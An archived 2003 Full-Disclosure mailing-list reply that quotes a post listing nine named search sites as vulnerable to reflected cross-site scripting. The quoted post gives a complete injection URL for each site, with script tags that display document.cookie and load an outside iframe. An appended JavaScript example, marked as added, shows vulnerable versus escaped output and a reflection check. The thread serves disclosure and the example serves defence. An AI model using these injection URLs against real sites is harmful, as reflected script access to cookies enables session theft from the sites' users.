Re: [Full-Disclosure] Search Engine XSS

From: Shanphen Dawa (list_at_hardlined.com)
Date: 07/23/03

    To: full-disclosure@lists.netsys.com
    Date: Wed, 23 Jul 2003 13:02:36 -0500
    
    

    Yes, but what effect does this have on the server? How does it compromise security? Can you use this to DoS the server? Can you use this to gain access to areas on the server otherwise not available?

    On Wed, 23 Jul 2003 02:18:05 -0700
    "morning_wood" <se_cur_ity@hotmail.com> wrote:

    > since we're on the subject now... I'll clear up my backlog...
    >
    > Sites Affected...
    >
    > Overture
    > Altavista
    > MetaCrawler
    > Excite
    > Webcrawler
    > InfoPlease
    > MarketWatch
    > Icq
    > Looksmart
    >
    >
    >
    > http://www.overture.com/d/search/;$sessionid$EVV5ZDIABJG13QFIEEOQPUQ?Keywords=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e
    >
    > http://www.altavista.com/web/results?pg=q&user=icq&q=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e
    >
    > http://www.metacrawler.com/_1_2IWUTDE03H14GMK__info.metac/dog/webresults.htm?&qkw=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&qcat=web&method=0&top=1&start=&ver=4049
    >
    > http://msxml.excite.com/_1_GMJTDE03H58B8U__info.xcite/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&start=&ver=13896
    >
    > http://dpxml.webcrawler.com/_1_HEMTDE03GPDFH2__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&start=&ver=22324
    >
    > http://www.infoplease.com/search.php3?src=icq&query=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&in=all
    >
    > http://bigcharts.marketwatch.com/symbollookup/symbollookupresults.asp?symb=>alert("You%20are%20vunerable%20to%20xss%20-%20discovered%20by%20morning_wood%20http://exploitlabs.com")</script><SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT><iframe%20src="http://whatismyip.com"></iframe>&country=all&type=all
    >
    > http://search.icq.com/search/results?q=%3Cscript%3Ealert%28%22You+are+vunerable+to+xss+%2D+discovered+by+morning%5Fwood+http%3A%2F%2Fexploitlabs%2Ecom%22%29%3C%2Fscript%3E%3CSCRIPT%3Ealert%28document%2Edomain%29%3B%3C%2FSCRIPT%3E%3CSCRIPT%3Ealert%28document%2Ecookie%29%3B%3C%2FSCRIPT%3E%3Ciframe+src%3D%22http%3A%2F%2Fwhatismyip%2Ecom%22%3E%3C%2Fiframe%3E
    >
    > http://www.looksmart.com/r_search?l&key=%3cscript%3ealert%28%22You+are+vunerable+to+xss+%2d+discovered+by+morning%5fwood+http%3a%2f%2fexploitlabs.com%22%29%3c%2fscript%3e%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e%3cSCRIPT%3ealert%28document.cookie%29%3b%3c%2fSCRIPT%3e%3ciframe+src%3d%22http%3a%2f%2fwhatismyip.com%22%3e%3c%2fiframe%3e&search=0
    >
    > this just shows the basics, some are worse than others...
    > so I guess that's all of em...
    >
    > Donnie Werner
    > morning_wood@exploitlabs.com
    > http://exploitlabs.com
    >
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html
    >

    -- 
    /*
    "To avoid all evil, to cultivate good, 
    and to cleanse one's mind  
    this is the teaching of the Buddhas."
    Martin Ekendahl
    http://www.hardlined.com
    martin@hardlined.com
    */
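
What the quoted links exercise, as an added example (not part of either post, and not code from any of the sites named): a search handler that echoes its query into the results page, shown beside the output-encoded form and a regression check for raw reflection. The echoed markup is parsed by the browser of whoever follows the link, in the search site's origin. The host, parameter name and function names are hypothetical; the sample URL is constructed and reuses only the `alert(document.domain)` probe from the quoted links.

```javascript
// Constructed sample: a search URL carrying markup in the query parameter,
// in the same shape as the links quoted in the thread (host is a placeholder).
const SAMPLE_URL =
  'http://search.example.test/results?q=' +
  '%3cSCRIPT%3ealert%28document.domain%29%3b%3c%2fSCRIPT%3e';

// Decode the parameter the way a web framework does before the handler runs.
function queryFrom(url, param = 'q') {
  return new URL(url).searchParams.get(param) ?? '';
}

// HTML-escape the characters that matter in element and attribute context.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Vulnerable pattern: the query is concatenated into the page as-is,
// once in element content and once inside an attribute value.
function renderVulnerable(q) {
  return `<h1>Results for ${q}</h1><input name="q" value="${q}">`;
}

// Hardened pattern: the same template with output encoding applied.
function renderEscaped(q) {
  const e = escapeHtml(q);
  return `<h1>Results for ${e}</h1><input name="q" value="${e}">`;
}

// Regression check for a test suite or scanner: is the raw query present
// in the response where the browser would parse it as markup?
function reflectsRawMarkup(html, q) {
  return /[<>"']/.test(q) && html.includes(q);
}

const q = queryFrom(SAMPLE_URL);
console.log('decoded query      :', q);
console.log('vulnerable reflects:', reflectsRawMarkup(renderVulnerable(q), q));
console.log('escaped reflects   :', reflectsRawMarkup(renderEscaped(q), q));
console.log('escaped page       :', renderEscaped(q));
```
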
    
